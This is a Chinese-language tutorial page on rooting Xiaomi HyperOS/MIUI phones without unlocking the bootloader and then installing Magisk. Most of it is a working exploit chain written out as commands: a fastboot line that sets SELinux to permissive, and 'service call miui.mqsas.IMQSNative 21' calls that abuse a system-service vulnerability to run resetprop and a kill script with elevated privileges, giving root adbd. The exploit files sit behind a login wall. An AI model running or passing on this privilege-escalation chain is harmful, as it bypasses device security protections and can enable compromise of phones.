欢迎光临
我们一直在努力

小米澎湃/MIUI 免 BL 开启 Magisk 教程:利用 mqsas 漏洞获取系统权限

⚠️ 重要警告 (FBI Warning)

请注意:本方法利用特定内核漏洞实现,并不适用于所有高通平台小米设备。在实践过程中若遇到任何非预期问题(如无限重启、黑屏),请立即停止操作。

🛠️ 准备工作

  • 环境需求: 电脑端已配置 ADB/Fastboot 环境。
  • 必要文件: 提前下载 resetpropxiaomi_magisk_new.zip 专用包。
  • 下载链接:
    🔒 内容已隐藏

    点击此区域 注册 / 登录 后查看

第一阶段:修改 Selinux 与触发漏洞

首先需要通过 Fastboot 将系统权限环境放开,并利用 mqsas 服务漏洞提权。

1. 修改 Selinux 为宽容模式

将手机重启至 Fastboot 模式,连接电脑执行以下命令:

fastboot oem set-gpu-preemption 0 androidboot.selinux=permissive
fastboot continue

开机后,务必进入“开发者选项”开启 USB 调试

2. 强制 Root 启动 adbd

在电脑终端执行以下推送命令:

adb push resetprop /data/local/tmp
adb shell chmod +x /data/local/tmp/resetprop
adb shell "printf 'kill -9 pgrep adbd' > /data/local/tmp/k.sh; chmod 777 /data/local/tmp/k.sh"

接着输入 adb shell 进入手机端命令行,依次执行以下三行核心指令触发漏洞:

service call miui.mqsas.IMQSNative 21 i32 1 s16 "/data/local/tmp/resetprop" i32 1 s16 "ro.debuggable 1" s16 "/dev/null" i32 60
service call miui.mqsas.IMQSNative 21 i32 1 s16 "/data/local/tmp/resetprop" i32 1 s16 "ro.secure 0" s16 "/dev/null" i32 60
service call miui.mqsas.IMQSNative 21 i32 1 s16 "/data/local/tmp/resetprop" i32 1 s16 "service.adb.root 1" s16 "/dev/null" i32 60
service call miui.mqsas.IMQSNative 21 i32 1 s16 "/system/bin/sh" i32 1 s16 "/data/local/tmp/k.sh" s16 "/dev/null" i32 60

验证: 退出 shell 后输入 adb root,若显示 adbd is already running as root,说明提权成功。

第二阶段:安装 Magisk 环境

获取临时 Root 后,我们即可加载完整的 Magisk 框架。

  1. 解压 xiaomi_magisk_new.zip 并进入文件夹。
  2. 执行推送与权限授予:
    adb push . /data/local/tmp
    adb shell chmod +x -Rv /data/local/tmp/busybox /data/local/tmp/live_setup.sh
  3. 进入 Shell 并执行安装脚本:
    adb shell
    cd /data/local/tmp
    ./live_setup.sh

注意: 执行完成后手机会黑屏重启,看到澎湃 OS 或 MIUI Logo 进入系统后,打开 Magisk 管理器即可生效。

📢 拔线时机: 由于热重启时无法自动检测重连,当设备重启进入系统并检查 LSPosed 或 Magisk 运行正常后,即可手动拔掉数据线。

#Root #小米 #免解BL #Magisk #玩机教程

赞(0)

评论 抢沙发

评论前必须登录!

立即登录   注册